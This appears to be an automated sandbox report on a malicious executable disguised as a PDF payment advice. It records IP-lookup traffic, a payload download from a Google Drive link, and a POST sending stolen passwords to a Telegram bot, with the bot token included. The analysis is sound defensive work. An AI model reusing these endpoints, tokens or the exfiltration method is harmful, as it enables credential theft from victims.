            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fnXDCYK5NFcR9mHvOBTCauQ_E-GuNG2L HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1fnXDCYK5NFcR9mHvOBTCauQ_E-GuNG2L&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd200f92d41c7fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E98000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E48000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.000000003505B000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034FB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034CC0000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E98000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E48000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.000000003505B000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034FB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034C41000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034CC0000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E98000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E48000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.000000003505B000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034FB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3023221846.0000000037598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3023221846.0000000037598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/9W
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3023221846.0000000037598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/IW
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E98000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E48000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.000000003505B000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034FB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034FB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149844924.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149691379.000000000499C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3001687513.0000000004938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3001687513.0000000004938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3001687513.0000000004972000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3001624535.0000000004890000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1fnXDCYK5NFcR9mHvOBTCauQ_E-GuNG2L
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3001687513.0000000004972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1fnXDCYK5NFcR9mHvOBTCauQ_E-GuNG2Ll
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2168450454.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2214513008.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3001687513.00000000049A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2168450454.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2214513008.00000000049AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/0329190839Z0
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2168450454.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2214513008.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149844924.00000000049AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fnXDCYK5NFcR9mHvOBTCauQ_E-GuNG2L&export=download
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3001687513.0000000004972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fnXDCYK5NFcR9mHvOBTCauQ_E-GuNG2L&export=downloadF
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3001687513.000000000498C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fnXDCYK5NFcR9mHvOBTCauQ_E-GuNG2L&export=downloadN
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2168450454.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2214513008.00000000049AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fnXDCYK5NFcR9mHvOBTCauQ_E-GuNG2L&export=downloada1
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149844924.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149691379.000000000499C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149844924.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149691379.000000000499C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149844924.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149691379.000000000499C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149844924.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149691379.000000000499C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149844924.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149691379.000000000499C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149844924.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149691379.000000000499C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149844924.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149691379.000000000499C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149844924.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149691379.000000000499C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
            Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
            Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
            Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exeStatic file information: Suspicious name
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032A0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_00404B300_2_00404B30
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_004070410_2_00407041
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_0040686A0_2_0040686A
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_004070414_2_00407041
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_0040686A4_2_0040686A
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_00404B304_2_00404B30
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_001560E04_2_001560E0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_001543284_2_00154328
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_00158DA04_2_00158DA0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_001559684_2_00155968
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_00152DD14_2_00152DD1
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374E76284_2_374E7628
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374ECCA04_2_374ECCA0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374E33274_2_374E3327
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374E03C44_2_374E03C4
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374E21814_2_374E2181
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374EE7904_2_374EE790
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374EC6494_2_374EC649
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374EDEEF4_2_374EDEEF
